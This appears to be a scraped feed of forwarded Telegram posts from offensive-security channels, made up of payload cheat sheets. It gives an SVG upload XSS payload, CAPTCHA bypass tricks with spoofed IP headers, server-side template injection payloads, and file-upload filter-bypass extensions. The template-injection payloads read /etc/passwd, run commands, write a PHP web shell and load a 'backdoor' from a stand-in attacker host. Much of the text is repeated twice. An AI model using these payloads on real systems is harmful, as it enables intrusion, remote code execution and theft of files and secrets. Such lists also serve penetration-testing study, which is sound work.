Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻💻
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>
👍5
Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻💻
CAPTCHA Bypass
* Send old captcha value.
* Send old captcha value with old session ID.
* Remove captcha with any adblocker and request again
* Bypass with OCR
* Response manipulation.
* Use any token with the same length(+1/-1).
* Remove the param value or remove the entire parameter.
* Change the method from POST to GET(or PUT) and remove the captcha.
* Change body to JSON or vice-versa.
* Check whether the value of the captcha is in the source code.
* Add headers:
X-Forwarded-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
* Send old captcha value.
* Send old captcha value with old session ID.
* Remove captcha with any adblocker and request again
* Bypass with OCR
* Response manipulation.
* Use any token with the same length(+1/-1).
* Remove the param value or remove the entire parameter.
* Change the method from POST to GET(or PUT) and remove the captcha.
* Change body to JSON or vice-versa.
* Check whether the value of the captcha is in the source code.
* Add headers:
X-Forwarded-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
❤🔥1👍1
SSTI (Server Side Template Injection)
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
👍5❤3👌1
File Upload Bypass -
Blacklisting Bypass
PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr
Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
Blacklisting Bypass
PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr
Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
👍11🤩3👌3❤1
Forwarded from WiFi Security
Wifi Penetration Testing : WPA2/WPA3 Handshake Capture & Cracking Workflow
👌2❤1